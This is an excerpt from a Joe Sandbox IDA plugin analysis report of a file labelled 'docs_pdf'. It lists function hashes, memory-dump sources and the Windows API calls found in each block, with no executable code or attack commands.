                                                            • Instruction ID: 1561f013af6961629a0934a1313fef266424fe9a093bc65fcd57bb5e0bb9ec80
                                                            • Opcode Fuzzy Hash: a5d3378d1389b15cd89df2caf5ce0805df542bfc14bf71dd9c4a968984b6f074
                                                            • Instruction Fuzzy Hash: 5E512D35A00209DFCF05EF64C981AAEBBF5EF08314B1480A9E909AB762CB31ED51DB51
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5ad15b2e8eeead99e7ab95fa782b9f04a0d792f83acd84af88c1ca77775a17a9
                                                            • Instruction ID: 406efbc73687b24c7fe4f63716e3591b651dbad81b9651dcc44e1ecf1ee82020
                                                            • Opcode Fuzzy Hash: 5ad15b2e8eeead99e7ab95fa782b9f04a0d792f83acd84af88c1ca77775a17a9
                                                            • Instruction Fuzzy Hash: D341E235900204ABC714DF28CC88BADBBB4FF89310F998165F95EA72E1C770AD81DA51
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 000F2357
                                                            • ScreenToClient.USER32(001B67B0,?), ref: 000F2374
                                                            • GetAsyncKeyState.USER32(00000001), ref: 000F2399
                                                            • GetAsyncKeyState.USER32(00000002), ref: 000F23A7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: AsyncState$ClientCursorScreen
                                                            • String ID:
                                                            • API String ID: 4210589936-0
                                                            • Opcode ID: 68876beb7add08ad25812354616f7f1310f47cc594ae055218a5ad9eec0d5752
                                                            • Instruction ID: 6e0788effaa0cddc0d280930077f0ae290f874bf2744e32c4abe5dce9c78acb0
                                                            • Opcode Fuzzy Hash: 68876beb7add08ad25812354616f7f1310f47cc594ae055218a5ad9eec0d5752
                                                            • Instruction Fuzzy Hash: 8A41C371504129FBCF199F64D844AFEBBB4FB15360F204319F92996290CB309EA4EFA1
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0014695D
                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 001469A9
                                                            • TranslateMessage.USER32(?), ref: 001469D2
                                                            • DispatchMessageW.USER32(?), ref: 001469DC
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001469EB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                            • String ID:
                                                            • API String ID: 2108273632-0
                                                            • Opcode ID: a76288fafce7fd2256afd00b68aa6eefbc767fa4d6ed80567d5c76b8f0040eb9
                                                            • Instruction ID: 6020cbd7d69380aa74136040497897d3be4f2ced27181cdc408896aea13ca0fb
                                                            • Opcode Fuzzy Hash: a76288fafce7fd2256afd00b68aa6eefbc767fa4d6ed80567d5c76b8f0040eb9
                                                            • Instruction Fuzzy Hash: 0A31E371900646AEDB24CF74CC44BB67BBCBB2630CF204269E425D35B1D7B898C6D792
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 00148F12
                                                            • PostMessageW.USER32(?,00000201,00000001), ref: 00148FBC
                                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00148FC4
                                                            • PostMessageW.USER32(?,00000202,00000000), ref: 00148FD2
                                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00148FDA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessagePostSleep$RectWindow
                                                            • String ID:
                                                            • API String ID: 3382505437-0
                                                            • Opcode ID: dd844ff3a05209aded4167a8313d9f06a6dad5afca50f8d879fb60a04d95a33b
                                                            • Instruction ID: 46a041e023f6717328f85d37e79df4dfbd4f24a5b2ab2cf82cde662389a1fe10
                                                            • Opcode Fuzzy Hash: dd844ff3a05209aded4167a8313d9f06a6dad5afca50f8d879fb60a04d95a33b
                                                            • Instruction Fuzzy Hash: 7831CE71500219EFDB14CF68D94CAAE7BB6EB04325F104229F929EA1E0C7B09998DB90
                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 0014B6C7
                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0014B6E4
                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0014B71C
                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0014B742
                                                            • _wcsstr.LIBCMT ref: 0014B74C
                                                            Similarity
                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                            • String ID:
                                                            • API String ID: 3902887630-0
                                                            • Opcode ID: 39060b66c7cb581239a6deb6e814262569250a98cc551b710777974b57711cd9
                                                            • Instruction ID: e29cfe7f3b471dbb1d4ace1aff2b41ee62248ff574047ad84d9c291ef9595329
                                                            • Instruction Fuzzy Hash: 1121FC71608204BBEB295B799C89E7B7BACDF49721F11403DFD09CA1B1EF61DC819660
                                                            APIs
                                                              • Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0017B44C
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0017B471
                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0017B489
                                                            • GetSystemMetrics.USER32(00000004), ref: 0017B4B2
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00161184,00000000), ref: 0017B4D0
                                                            Similarity
                                                            • API ID: Window$Long$MetricsSystem
                                                            • String ID:
                                                            • API String ID: 2294984445-0
                                                            • Opcode ID: 50317d51d3ef3c4ee70e81c5d053a055deaf0df2b2d5c09833eb4030a7334e74
                                                            • Instruction ID: 81e8b86328f947463e93787804481b708c311d5686e6a0519b0217bbae502b54
                                                            • Instruction Fuzzy Hash: 35216071518255AFCB149F39CC88B6A37B4FB05720F258728F92BD75E1E7309891DB90
                                                            APIs
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00149802
                                                              • Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00149834
                                                            • __itow.LIBCMT ref: 0014984C
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00149874
                                                            • __itow.LIBCMT ref: 00149885
                                                            Similarity
                                                            • API ID: MessageSend$__itow$_memmove
                                                            • String ID:
                                                            • API String ID: 2983881199-0
                                                            • Opcode ID: 33c6b703e40bf0ece515af1ca74cdc77032e0f57454e8d292713cecebd50ce60
                                                            • Instruction ID: 4f9d5af8829ed508c3700d3862f8e0437bea05190199f833d45f2f6f0889c3bc
                                                            • Instruction Fuzzy Hash: CF219875B0020DABDB119A698C86EEF7BB9EF4A710F044039FA09DB2A1D7708D8597D1
                                                            APIs
                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000F134D
                                                            • SelectObject.GDI32(?,00000000), ref: 000F135C
                                                            • BeginPath.GDI32(?), ref: 000F1373
                                                            • SelectObject.GDI32(?,00000000), ref: 000F139C
                                                            Similarity
                                                            • API ID: ObjectSelect$BeginCreatePath
                                                            • String ID:
                                                            • API String ID: 3225163088-0
                                                            • Opcode ID: 86cbb39c006112b66bab78464ac3ed5731df686f2d460dac23d672c1eaa7fca1
                                                            • Instruction ID: a7fcd40341da55880436b6e395950aea5a536084ae284a4899933035382bbad7
                                                            • Instruction Fuzzy Hash: 45210E71800308EBDB119F25EC447B97BF9FB10321F14432AF91896DA1D77999E1EB90
                                                            APIs
                                                            Similarity
                                                            • API ID: _memcmp
                                                            • String ID:
                                                            • API String ID: 2931989736-0
                                                            • Opcode ID: a64a7f06c3055140f8161835599f744514e6dbb1f50655fa9ebb192e060cf756
                                                            • Instruction ID: 34686ce5bac3d4f8f751bb69835db060be3546d6e0c19088c552acfba7bef037
                                                            • Instruction Fuzzy Hash: F501B5B1A06105BBE209B6209C42FBBB75C9B21BA4F044021FE04962A3E7A1EF11C7F0
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00154D5C
                                                            • __beginthreadex.LIBCMT ref: 00154D7A
                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00154D8F
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00154DA5
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00154DAC
                                                            Similarity
                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                            • String ID:
                                                            • API String ID: 3824534824-0
                                                            • Opcode ID: 9a9c44604dde820c3b3c432691f0e3fe8bf43775d3c35131ca45cd39b9f9b19b
                                                            • Instruction ID: 43ac49f1b039cbcb6f8259887172b0db1ca9b619604c367c7fae55369e8f1b80
                                                            • Instruction Fuzzy Hash: EF11E576904208EBD7019BA8DC08ADB7BBCEB55325F1443A9FD28D7650D7758DC48BA0
                                                            APIs
                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00148766
                                                            • GetLastError.KERNEL32(?,0014822A,?,?,?), ref: 00148770
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,0014822A,?,?,?), ref: 0014877F
                                                            • HeapAlloc.KERNEL32(00000000,?,0014822A,?,?,?), ref: 00148786
                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0014879D
                                                            Similarity
                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 842720411-0
                                                            • Opcode ID: a6edb19ac7350db9b8092145849ffb8c45b1a2b9ebe1bb6d33790eeed87d4042
                                                            • Instruction ID: 2566315b0cd605c84997dd44221cdb107ae0c463ccbcc91cd4e86eff9c79885e
                                                            • Instruction Fuzzy Hash: 1A014B71204208EFDB204FA6DC88D6BBBBCFF89356B200439F849C2260DB318C81CA60
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00155502
                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00155510
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00155518
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00155522
                                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0015555E
                                                            Similarity
                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                            • String ID:
                                                            • API String ID: 2833360925-0
                                                            • Opcode ID: eec74c392914c9712100ae8798ab8b8df092ca159618708acfb17c6975d922d3
                                                            • Instruction ID: ad2e7933f158c315f846b5c748c56e09f9d75d1996f1062647660c565f302e0a
                                                            • Instruction Fuzzy Hash: 0C015B31C10A2DDBCF00DFE8E8989EEBB7AFB09712F41005AE815F6540EB309598C7A1
                                                            APIs
                                                            • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0014758C,80070057,?,?,?,0014799D), ref: 0014766F
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0014758C,80070057,?,?), ref: 0014768A
                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0014758C,80070057,?,?), ref: 00147698
                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0014758C,80070057,?), ref: 001476A8
                                                            • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0014758C,80070057,?,?), ref: 001476B4
                                                            Similarity
                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                            • String ID:
                                                            • API String ID: 3897988419-0
                                                            • Opcode ID: d4671f82849b73373349d08ff66660424ff7b1bb6453f2c758f40438c5e7a32b
                                                            • Instruction ID: 148540a1e2825810404b8129c1edb3f414e89bc5404321ab45f8db24fea04d69
                                                            • Instruction Fuzzy Hash: E9018476605614BBEB109F58DC44BAE7BBEEF45751F150028FD08D2271E731DD8197A0
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00148608
                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00148612
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00148621
                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00148628
                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0014863E
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: 4400ef85a5abacae957ad8b09e363f90d1392cb96eac872b42b67f935da8acd3
                                                            • Instruction ID: fddff0a5258d1e69a8692ae84107a990125383cd2987e27a12ad3faf31fddf2f
                                                            • Instruction Fuzzy Hash: 00F04F35201204AFEB100FA9DC89E6F3BBDFF89B54F500439F949C6160CB619C82DA60
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00148669
                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00148673
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00148682
                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00148689
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0014869F
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: 9071975968368d20562fdcfcf7d098b1d4e77346e44ae3291c492d71ead2f1e8
                                                            • Instruction ID: b05260fba8d51d78d01ef9235663fe1a5bee5002472b844a03fb9061f807b2c9
                                                            • Instruction Fuzzy Hash: 9DF04F75200204AFEB111FA5EC88E6B7BBDFF8A754F100029F949C6160CB619982DA60
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 0014C6BA
                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 0014C6D1
                                                            • MessageBeep.USER32(00000000), ref: 0014C6E9
                                                            • KillTimer.USER32(?,0000040A), ref: 0014C705
                                                            • EndDialog.USER32(?,00000001), ref: 0014C71F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                            • String ID:
                                                            • API String ID: 3741023627-0
                                                            • Opcode ID: 9d71993528d6a6a9e3a690bc539a5ca847ecdb4083f925a3f5b5e076e6e9f2af
                                                            • Instruction ID: 703199de0e3eee306fbcd2bb0da65601cce3433973673256047539763046a6f8
                                                            • Opcode Fuzzy Hash: 9d71993528d6a6a9e3a690bc539a5ca847ecdb4083f925a3f5b5e076e6e9f2af
                                                            • Instruction Fuzzy Hash: DA014F34501704ABEB655B20DD4EFA677B8BB00746F00066DB546A18F1DBE0A9D58E81
                                                            APIs
                                                            • EndPath.GDI32(?), ref: 000F13BF
                                                            • StrokeAndFillPath.GDI32(?,?,0012BAD8,00000000,?), ref: 000F13DB
                                                            • SelectObject.GDI32(?,00000000), ref: 000F13EE
                                                            • DeleteObject.GDI32 ref: 000F1401
                                                            • StrokePath.GDI32(?), ref: 000F141C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                            • String ID:
                                                            • API String ID: 2625713937-0
                                                            • Opcode ID: 1d4087a3d9bd8e68d1d7efa8c09f484990dbf884c69c45bf2ca9c695b7093392
                                                            • Instruction ID: ed5cbebf412db7957288f661f87a05f71233aa85a5ad76e8037880dbbcfaf99c
                                                            • Opcode Fuzzy Hash: 1d4087a3d9bd8e68d1d7efa8c09f484990dbf884c69c45bf2ca9c695b7093392
                                                            • Instruction Fuzzy Hash: 55F0B231004308EBDB225F26EC087A93BB5AB51326F048328F52995DF1C73999E6EF50
                                                            APIs
                                                              • Part of subcall function 00110FF6: std::exception::exception.LIBCMT ref: 0011102C
                                                              • Part of subcall function 00110FF6: __CxxThrowException@8.LIBCMT ref: 00111041
                                                              • Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82
                                                              • Part of subcall function 000F7BB1: _memmove.LIBCMT ref: 000F7C0B
                                                            • __swprintf.LIBCMT ref: 0010302D
                                                            Strings
                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00102EC6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                            • API String ID: 1943609520-557222456
                                                            • Opcode ID: d6b63d55d37ed5ffd1df34341fc2be2a577c5d66864c73faf1b34b3137d78476
                                                            • Instruction ID: a1be5409cfe7060e89b3bfe12dea6d6fa1dc2002486fd25b1ec0293b45b477c0
                                                            • Opcode Fuzzy Hash: d6b63d55d37ed5ffd1df34341fc2be2a577c5d66864c73faf1b34b3137d78476
                                                            • Instruction Fuzzy Hash: D3919931508305AFC728EF24D895CBFB7A8EF95740F00492DF5969B2A2DB60EE44DB52
                                                            APIs
                                                              • Part of subcall function 000F48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000F48A1,?,?,000F37C0,?), ref: 000F48CE
                                                            • CoInitialize.OLE32(00000000), ref: 0015BC26
                                                            • CoCreateInstance.OLE32(00182D6C,00000000,00000001,00182BDC,?), ref: 0015BC3F
                                                            • CoUninitialize.OLE32 ref: 0015BC5C
                                                              • Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
                                                              • Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                            • String ID: .lnk
                                                            • API String ID: 2126378814-24824748
                                                            • Opcode ID: ea5fbbea15da76e83dfb6393218d175df2a439fad4c39ee3722fc87154eec02b
                                                            • Instruction ID: d0394cb31cda0c971003b30d2c4795107599aa8c445ac5f16f2f5ad0fa7513df
                                                            • Opcode Fuzzy Hash: ea5fbbea15da76e83dfb6393218d175df2a439fad4c39ee3722fc87154eec02b
                                                            • Instruction Fuzzy Hash: 9BA136756083059FCB00DF14C484E6ABBE5FF88315F158998F9A99B262CB31ED49CB91
                                                            APIs
                                                            • __startOneArgErrorHandling.LIBCMT ref: 001152DD
                                                              • Part of subcall function 00120340: __87except.LIBCMT ref: 0012037B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ErrorHandling__87except__start
                                                            • String ID: pow
                                                            • API String ID: 2905807303-2276729525
                                                            • Opcode ID: c76f2b48bda2d954486275df6a27fe43e9ecd2106f8f07981dd315cc177119b3
                                                            • Instruction ID: 5b737a63fab2b99cfbd536712c1f4d475d437b8836e41f5927d9798c96c87b0c
                                                            • Opcode Fuzzy Hash: c76f2b48bda2d954486275df6a27fe43e9ecd2106f8f07981dd315cc177119b3
                                                            • Instruction Fuzzy Hash: E1516C22A1C601C7CB1AB714E9413BE6B91AB84750F308A78E4D5836E7EF74CCE49B46
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #$+
                                                            • API String ID: 0-2552117581
                                                            • Opcode ID: fe36bc757ac5b48deb659832c2cb41c6c4769804af75a9fa17b4f7616c454de9
                                                            • Instruction ID: b32c6e3dae672cf9cffff80ebe3de24b315b79c5dba835faed1f426a3e076757
                                                            • Opcode Fuzzy Hash: fe36bc757ac5b48deb659832c2cb41c6c4769804af75a9fa17b4f7616c454de9
                                                            • Instruction Fuzzy Hash: 055125359046499FCF1A9FA8C888AFA7BA5FF1A310F144065F8919B2A2D7709C82C761
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _memset$_memmove
                                                            • String ID: ERCP
                                                            • API String ID: 2532777613-1384759551
                                                            • Opcode ID: 9ba64f46e70ba2d3039211ddc0425d3106c9edf5f059f1cff1e5c16e882eefe1
                                                            • Instruction ID: 9227b66b0c448a6a345bbc3398eca15b36f624e94911f29c3e9b1a0ae6ab7e2e
                                                            • Opcode Fuzzy Hash: 9ba64f46e70ba2d3039211ddc0425d3106c9edf5f059f1cff1e5c16e882eefe1
                                                            • Instruction Fuzzy Hash: 1A51B2719007099FDB28CF65C8817AABBF4FF04714F20856EE98ADB691E7B19694CB40
                                                            APIs
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0017F910,00000000,?,?,?,?), ref: 00177C4E
                                                            • GetWindowLongW.USER32 ref: 00177C6B
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00177C7B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
